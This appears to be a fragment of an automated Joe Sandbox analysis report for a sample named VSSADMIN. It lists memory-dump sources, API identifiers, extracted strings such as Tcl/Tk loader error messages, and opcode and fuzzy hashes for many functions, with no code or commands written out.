• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
• Opcode ID: 100244ad11a5ca47b3e63d731413f73159be8c16d425433171175cfe94e11ddb
• Instruction ID: b8acbb6162d10366901cdd0d9b1533c4008b126081ed739b632de1c7b5791c06
• Opcode Fuzzy Hash: 100244ad11a5ca47b3e63d731413f73159be8c16d425433171175cfe94e11ddb
• Instruction Fuzzy Hash: 55B13577614B89CAEB158F29C8863693BB0F745F5CF188922DA5D837A4CF3AD451C710
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 0e172d7ea5e890d92c6a2989d53da8e3c55f614dc17c23923d45aaf4937351c2
• Instruction ID: 7a90dff0425b99d7fa43c8e9694379d4cdd68b11326e0157d5277d388f322468
• Opcode Fuzzy Hash: 0e172d7ea5e890d92c6a2989d53da8e3c55f614dc17c23923d45aaf4937351c2
• Instruction Fuzzy Hash: 31F08122A1DB8587EB608F64F4C47AA73A0BB85B35F044237D66D436E4DF3CE009CA00
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $
                                                                                                                                                                      • API String ID: 0-227171996
                                                                                                                                                                      • Opcode ID: f5e1524899c56bc23ad3890ea476fd64461aaca1c1c6cf088a54164d3a5803aa
                                                                                                                                                                      • Instruction ID: 7cab06bb68594b722589de0c420e2e1c1f8acb2280fb5f47fa61ea83a101d9a3
                                                                                                                                                                      • Opcode Fuzzy Hash: f5e1524899c56bc23ad3890ea476fd64461aaca1c1c6cf088a54164d3a5803aa
                                                                                                                                                                      • Instruction Fuzzy Hash: 60E1B376A08E0385EB688B2580D813937B1FF46F68F145137DA4E877E5DF2AE841E340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                      • API String ID: 0-3030954782
                                                                                                                                                                      • Opcode ID: fc16f48a51adf8395f54aceaf0b9db76d004ae62db191d73de727a3be8067e6d
                                                                                                                                                                      • Instruction ID: 93ea8effb002646adbc555d1b98ea723702f5f3539a69c87115bd7fdcd6d210f
                                                                                                                                                                      • Opcode Fuzzy Hash: fc16f48a51adf8395f54aceaf0b9db76d004ae62db191d73de727a3be8067e6d
                                                                                                                                                                      • Instruction Fuzzy Hash: AA515966B18AD686E7248A35D8807696BA1EB46FB4F489232CB6887AD5CF3DD4418700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1010374628-0
                                                                                                                                                                      • Opcode ID: cea5f1581e6f6f7252908686e38380e83d2f5f1cef5c30cfc758325be99675c1
                                                                                                                                                                      • Instruction ID: 420733add9f81a24c4c7362934ee33e662b914bcb7ada205944b20f7ec50753d
                                                                                                                                                                      • Opcode Fuzzy Hash: cea5f1581e6f6f7252908686e38380e83d2f5f1cef5c30cfc758325be99675c1
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E029F22E1DE4750FA65AB2194E12BA26B0AF47FB4F04463BDE5DC77D2DE3DA401A310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: gfffffff
                                                                                                                                                                      • API String ID: 0-1523873471
                                                                                                                                                                      • Opcode ID: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                                                                                                                                      • Instruction ID: cc67d198c2d019ae819fa75e9a0d604df5d18694da4de55056d789afaacfc24f
                                                                                                                                                                      • Opcode Fuzzy Hash: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                                                                                                                                      • Instruction Fuzzy Hash: A7A14872A18BC686EB21CB29A0807A97BA0EB56FA4F058133DE4D87785DE3DD501E701
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: TMP
                                                                                                                                                                      • API String ID: 3215553584-3125297090
                                                                                                                                                                      • Opcode ID: 24f8c0f4820d0cfba61cbc4c59964b8a243fb78d0a30f9d39ddbc7d824280f77
                                                                                                                                                                      • Instruction ID: e36f33de6ccb18332c4cf5a1c28307fef9e220e523d97ac17a544ce488da96de
                                                                                                                                                                      • Opcode Fuzzy Hash: 24f8c0f4820d0cfba61cbc4c59964b8a243fb78d0a30f9d39ddbc7d824280f77
                                                                                                                                                                      • Instruction Fuzzy Hash: B851A415B0AE4351FA64AB669D911BA52B1AF87FE4F484036DE0DC77D2FF3CE4626200
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                      • Opcode ID: 2f1302fce1481fbe20b13d751b936209868e95a9271a4e16dc4ced5aa84efd4b
                                                                                                                                                                      • Instruction ID: 1304ed505d3ac40cb92c2ea740793f375db9ac42a5a96d750c97573ee6a44768
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f1302fce1481fbe20b13d751b936209868e95a9271a4e16dc4ced5aa84efd4b
                                                                                                                                                                      • Instruction Fuzzy Hash: FFB09224E07E82D2EE0C2B29ACC222423B47F59B60F98407AC00C82320DF2D28AA5702
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 740f364038b0a02b74aefc6a4002d605bb8d66e8ece03474d19f7dcd3f76f926
• Instruction ID: 0f4e8741d02055cd5afaac3a5839fe6a8874107b4f85a66c1c88f48d296ca1c2
• Opcode Fuzzy Hash: 740f364038b0a02b74aefc6a4002d605bb8d66e8ece03474d19f7dcd3f76f926
• Instruction Fuzzy Hash: 72D1B526A08E4785EB688F25958827D27B2FF46F68F144237CE4E876D5DF39E841E340
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41c2dd31deb4208f6a64af358637e949a31ffee90b73308347fda93b72d461a0
• Instruction ID: 13bd95297ab99150844daf9cb97ae099c32f4b89eedb88ebeaf775024fa9b9af
• Opcode Fuzzy Hash: 41c2dd31deb4208f6a64af358637e949a31ffee90b73308347fda93b72d461a0
• Instruction Fuzzy Hash: 1FC194722181E04BE2C9EB29E46947E77A1F78D35EB94403BEB8747B89C73CA414D750
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 081855a1139a905c050f004adae9c343e6fe2e6a907cc23c5706cce6c129a0ff
• Instruction ID: e7664f2e91afe78b94e59d50b6f3941c016497969a7230d0dc6ac89b7b1ae7b4
• Opcode Fuzzy Hash: 081855a1139a905c050f004adae9c343e6fe2e6a907cc23c5706cce6c129a0ff
• Instruction Fuzzy Hash: DFB16E76908B8689E7658F29C09827D3BB1E746F68F244137CB4E87399DF39D841E704
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c73884664ec6463b3ef8ba4e0c781f3417535d3b4587aef21b1cb5b9e685f8d4
• Instruction ID: e5102d0faebc3bc024e51d42d93fede6ab7f50ddb2273e8fa36000efae304bf0
• Opcode Fuzzy Hash: c73884664ec6463b3ef8ba4e0c781f3417535d3b4587aef21b1cb5b9e685f8d4
• Instruction Fuzzy Hash: B181A572A0CB8286E774CF15D48037A76B1FB86BA4F544236DA9D87B99DF3CE4419B00
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3bf38bb552e652050a5a4325e5c4404943d37f9760ac8566a9e89c8f0e7421a3
• Instruction ID: 472c95f83ef0b351014b0551faa3d00f70c272e58f54976015a960076bb4bbb1
• Opcode Fuzzy Hash: 3bf38bb552e652050a5a4325e5c4404943d37f9760ac8566a9e89c8f0e7421a3
• Instruction Fuzzy Hash: 4A610923F1CA9256FB248928C4D037D66A1AF62F78F55023BD61EC76C5EE7EE8018704
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
• Instruction ID: 006979ef8885678ae3eef1199d945128724ca4340e782aa1e553f738d6b27d00
• Opcode Fuzzy Hash: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
• Instruction Fuzzy Hash: 75516476A18A6286E7248B29D48023937F1EB96F78F244132CE4D97795DF3AEC42D740
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
• Instruction ID: 6f69ce8e5e518fdabb0ae9fcf85759bff3e855f8ebd377b197db6f3e1b7da469
• Opcode Fuzzy Hash: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
• Instruction Fuzzy Hash: 5F5154B6A19E5285E7648F2AC08022927B0FB56F78F254136CA4D97795CF3AE842D740
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
• Instruction ID: 0da443adf3587d0a84184b18e4223e1d7fd88d47c2425ab743bc025dd0cc97f4
• Opcode Fuzzy Hash: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
• Instruction Fuzzy Hash: EE515376A18E5286E7648F29D08067837F0EBC6F78F244132CA8D97795CF3AE842D740
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Uniqueness

Uniqueness Score: -1.00%

Similarity
• API ID: ErrorLastPrivilegeRelease
• String ID:
• API String ID: 1334314998-0
                                                                                                                                                                      • Instruction Fuzzy Hash: D8A0026590CC46E1EE449B04F8D00302770FF52B69B400073D55DC30A0AF3EB440E301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                      • API String ID: 190572456-2208601799
                                                                                                                                                                      • Opcode ID: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                      • Instruction ID: cc77478cef4e4865c127855ced30ecffb89254863447c57f9a8509bea91ed954
                                                                                                                                                                      • Opcode Fuzzy Hash: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                      • Instruction Fuzzy Hash: E4E18564A0DF43A2FE558B18F9D017423B5AF17FB9BC46037C84E87664EF7EA5588201
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                      • String ID: P%
                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                      • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
